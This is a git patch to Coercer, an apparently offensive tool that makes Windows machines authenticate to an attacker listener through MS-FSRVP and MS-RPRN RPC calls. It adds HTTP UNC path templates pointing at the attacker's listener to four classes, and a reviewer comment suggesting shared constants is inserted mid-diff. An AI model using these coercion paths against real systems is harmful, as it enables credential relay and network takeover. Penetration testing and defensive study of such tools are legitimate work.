From a42040b19e9babcf8d6e16516c22c79c3d2cb45f Mon Sep 17 00:00:00 2001
From: "Remi GASCOU (Podalirius)" <79218792+p0dalirius@users.noreply.github.com>
Date: Mon, 14 Oct 2024 18:17:06 +0200
Subject: [PATCH] Fixed #83
---
 coercer/methods/MS_FSRVP/IsPathShadowCopied.py | 3 ++-
 coercer/methods/MS_FSRVP/IsPathSupported.py | 3 ++-
 .../MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py | 3 ++-
 .../MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py | 2 +-
 4 files changed, 7 insertions(+), 4 deletions(-)
diff --git a/coercer/methods/MS_FSRVP/IsPathShadowCopied.py b/coercer/methods/MS_FSRVP/IsPathShadowCopied.py
index 0687d97..571bdab 100644
--- a/coercer/methods/MS_FSRVP/IsPathShadowCopied.py
+++ b/coercer/methods/MS_FSRVP/IsPathShadowCopied.py
@@ -36,7 +36,8 @@ class IsPathShadowCopied(MSPROTOCOLRPCCALL):
 """
 exploit_paths = [
- ("smb", '\\\\{{listener}}\x00')
+ ("smb", '\\\\{{listener}}\x00'),
+ ("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')
 ]
 access = {
diff --git a/coercer/methods/MS_FSRVP/IsPathSupported.py b/coercer/methods/MS_FSRVP/IsPathSupported.py
index a62c8b4..bd9ff62 100644
--- a/coercer/methods/MS_FSRVP/IsPathSupported.py
+++ b/coercer/methods/MS_FSRVP/IsPathSupported.py
@@ -36,7 +36,8 @@ class IsPathSupported(MSPROTOCOLRPCCALL):
 """
 exploit_paths = [
- ("smb", '\\\\{{listener}}\x00')
+ ("smb", '\\\\{{listener}}\x00'),
+ ("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')
 ]
 access = {
diff --git a/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py b/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py
index b4ab89c..848a674 100644
--- a/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py
+++ b/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py
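Review bot: The tuple `("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')` now appears verbatim in four classes (IsPathShadowCopied, IsPathSupported, RpcRemoteFindFirstPrinterChangeNotification and RpcRemoteFindFirstPrinterChangeNotificationEx), and the `@80/print` literal this commit replaces in the last of them shows how such copies drift apart. I would define the two templates once next to MSPROTOCOLRPCCALL and reference them, e.g. `exploit_paths = [SMB_UNC_TEMPLATE, HTTP_UNC_TEMPLATE]` (the constant names are a suggestion, not existing identifiers). A one-line comment should also say which component expands `{{http_listen_port}}` and `{{rnd(3)}}`, since neither placeholder is defined in these hunks. Each class body continues outside its hunk, so I cannot tell whether other entries need the same treatment.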
@@ -19,7 +19,8 @@ class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
 """
 exploit_paths = [
- ("smb", '\\\\{{listener}}\x00')
+ ("smb", '\\\\{{listener}}\x00'),
+ ("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')
 ]
 access = {
diff --git a/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py b/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py
index 5def06d..f315546 100644
--- a/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py
+++ b/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py
@@ -20,7 +20,7 @@ class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL):
 exploit_paths = [
 ("smb", '\\\\{{listener}}\x00'),
- ("http", '\\\\{{listener}}@80/print\x00')
+ ("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')
 ]
 access = {